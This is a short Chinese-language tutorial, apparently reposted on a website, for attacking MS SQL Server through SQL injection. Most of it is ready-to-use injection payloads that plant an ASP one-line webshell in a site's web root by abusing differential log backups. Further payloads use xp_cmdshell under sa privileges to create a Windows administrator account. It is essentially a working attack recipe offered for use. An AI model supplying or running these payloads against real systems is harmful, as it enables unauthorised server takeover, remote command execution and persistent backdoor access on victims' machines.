手工實(shí)現(xiàn)差異備份的步驟

字符型：

1、恢復(fù)當(dāng)前庫
;alter database 當(dāng)前庫 set RECOVERY FULL--

2、建表cmd
;create table cmd (a image)--

3、備份當(dāng)前庫到D:\cmd1
;backup log 當(dāng)前庫 to disk = 'D:\cmd1' with init--

4、插入一句話代碼到創(chuàng)建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5、備份一句話代碼到站點(diǎn)根目錄
;backup log 當(dāng)前庫 to disk = 'D:\www_web\oct.asp'--

6、完成
;drop table 創(chuàng)建的表--

數(shù)字型

1、恢復(fù)當(dāng)前庫
';alter database 當(dāng)前庫 set RECOVERY FULL--

2、創(chuàng)建表cmd
';create table cmd (a image)--

3、備份當(dāng)前庫到D:\cmd1
';backup log 當(dāng)前庫 to disk = 'D:\cmd1' with init--

4、插入一句話代碼到創(chuàng)建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5、備份一句話代碼到站點(diǎn)根目錄
';backup log 當(dāng)前庫 to disk = 'D:\www_web\oct.asp'--

6、完成
';drop table 創(chuàng)建的表--

sa權(quán)限創(chuàng)建管理員用戶

1、判斷是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判斷當(dāng)前系統(tǒng)的連接用戶是不是sa

2、添加系統(tǒng)的管理員
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--

逍遙復(fù)仇：有工具我是一定不會手工的，麻煩。

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。